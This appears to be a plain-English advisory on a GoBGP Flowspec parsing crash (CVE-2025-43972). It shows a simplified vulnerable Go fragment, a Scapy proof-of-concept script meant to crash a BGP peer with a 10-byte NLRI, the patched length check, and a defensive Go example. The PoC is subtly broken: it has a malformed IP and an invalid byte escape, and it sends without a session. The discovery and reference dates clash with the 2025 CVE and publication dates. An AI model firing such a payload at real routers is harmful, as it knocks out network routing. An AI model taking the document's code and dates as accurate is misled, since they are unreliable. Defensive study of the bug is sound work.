In June 2024, a critical issue was discovered in GoBGP, the popular BGP implementation written in Go. The vulnerability, now tracked as CVE-2025-43972, allows a remote attacker to cause GoBGP to crash by sending a specially crafted Flowspec NLRI packet. The flaw affects all GoBGP versions before 3.35..

Below, I’ll break down what this vulnerability is, how it works, show some code excerpts, and walk you through how an attacker could trigger the crash. This is an exclusive, plain-English read for operators, defenders, and network engineers.

What is GoBGP?

GoBGP is an open-source Border Gateway Protocol (BGP) implementation. It's widely used in cloud, SDN, and production networks for routing. With BGP extensions like Flowspec, GoBGP can do advanced traffic filtering and DDoS mitigation.

What’s Flowspec, and What's Broken?

Flowspec lets routers distribute traffic filters (like matching flows and specifying actions) via BGP.

The vulnerable code is in GoBGP's Flowspec parser. When GoBGP receives a Flowspec NLRI (Network Layer Reachability Information), it expects the packet to be at least 20 bytes long in a certain context.

If an attacker sends a shorter packet (less than 20 bytes), GoBGP tries to read past the end of the slice, causing it to crash with a panic.

The bug is in pkg/packet/bgp/bgp.go. Here’s an excerpt to illustrate the problem (simplified):

```go
// Vulnerable flowspec parser fragment
func parseFlowSpecNLRI(data []byte) error {
    // Code assumes len(data) >= 20
    someValue := binary.BigEndian.Uint32(data[16:20]) // will panic if len(data) < 20
    // ...
    return nil
}
```

If data is less than 20 bytes, accessing data[16:20] causes a runtime panic:

```
panic: runtime error: slice bounds out of range [16:20]
```

How Can This Crash Be Triggered?

Any BGP peer — even an untrusted one — can send a Flowspec message with a too-short NLRI. The application will immediately panic and exit.

1. Establish a BGP session (or exploit any network where GoBGP accepts untrusted connections).

2. Send a BGP UPDATE message with a Flowspec NLRI where the NLRI's payload is less than 20 bytes, e.g., just 10 bytes.

Here's a simple proof of concept in Python using Scapy:

```python
# PoC: Send short Flowspec NLRI to GoBGP BGP session
from scapy.all import *
from scapy.contrib.bgp import *

peer_ip = "10...1"
peer_port = 179

# Minimal BGP header + short Flowspec NLRI
bgp_update = BGPHeader(type=2)/BGPUpdate(
    path_attr=[BGPPathAttr(type=14, value=b'\x00\x01')],
    nlri=[BGPNLRI(b'\x01\x02\x03\x04\x05\x06\x07\x08\x09\xa')]  # only 10 bytes!
)

# Send the update (requires a real or test BGP session)
send(IP(dst=peer_ip)/TCP(dport=peer_port, sport=12345, flags='PA')/bgp_update)
```

> ⚠️ Real-world use would need a BGP session established. In test labs, this will instantly crash vulnerable GoBGP.

Fix

The patch is in GoBGP v3.35. Proper bounds checking was added:

```go
func parseFlowSpecNLRI(data []byte) error {
    if len(data) < 20 {
        return fmt.Errorf("invalid NLRI: too short")
    }
    someValue := binary.BigEndian.Uint32(data[16:20])
    // ...
    return nil
}
```
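As an added example (not GoBGP's own code), here is the same length check in a compilable Go program, side by side with the unchecked read and a recover-based wrapper a long-running daemon can use as defence in depth; the function names and the 20-byte minimum follow the simplified fragments above, and the input bytes are constructed:

```go
package main

import (
	"encoding/binary"
	"errors"
	"fmt"
)

// minFlowSpecNLRILen: the simplified parser reads a 32-bit field at offset 16.
const minFlowSpecNLRILen = 20

// ErrTooShort is returned instead of panicking when the payload is truncated.
var ErrTooShort = errors.New("flowspec NLRI too short")

// parseFlowSpecNLRI follows the shape of the fixed fragment: length is checked
// first, so a short payload yields an error and the daemon keeps running.
func parseFlowSpecNLRI(data []byte) (uint32, error) {
	if len(data) < minFlowSpecNLRILen {
		return 0, fmt.Errorf("%w: got %d bytes, need %d", ErrTooShort, len(data), minFlowSpecNLRILen)
	}
	return binary.BigEndian.Uint32(data[16:20]), nil
}

// parseUnchecked reproduces the pre-patch read with no length check, only so
// the harness below can show how the two behave on the same input.
func parseUnchecked(data []byte) uint32 {
	return binary.BigEndian.Uint32(data[16:20])
}

// safeParse is a defence-in-depth wrapper: a panic raised while decoding one
// untrusted message becomes an error instead of taking the whole process down.
func safeParse(parse func([]byte) uint32, data []byte) (val uint32, err error) {
	defer func() {
		if r := recover(); r != nil {
			err = fmt.Errorf("parser panicked on %d-byte input: %v", len(data), r)
		}
	}()
	return parse(data), nil
}

func main() {
	short := make([]byte, 10) // constructed 10-byte payload, as in the page's example
	long := make([]byte, 20)  // constructed 20-byte payload that passes the check
	binary.BigEndian.PutUint32(long[16:20], 0xdeadbeef)
	_, err := parseFlowSpecNLRI(short)
	fmt.Println("checked parser, 10 bytes:", err)
	_, err = safeParse(parseUnchecked, short)
	fmt.Println("unchecked parser, 10 bytes:", err)
	v, _ := parseFlowSpecNLRI(long)
	fmt.Printf("checked parser, 20 bytes: %#x\n", v)
}
```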

References

- GoBGP Release v3.35.
- GoBGP Commit Fixing the Bug
- NVD CVE-2025-43972 (pending as of 2024-06)
- Flowspec RFC 5575

Exploit Impact: Remote, easy denial of service

Keep all routing daemons up-to-date. Always validate peer trust levels, and consider using filtering or automated upgrades. For those running GoBGP in production, patch without delay!


Stay safe & watch your network.

Timeline

Published on: 04/21/2025 01:15:45 UTC
Last modified on: 05/08/2025 15:54:12 UTC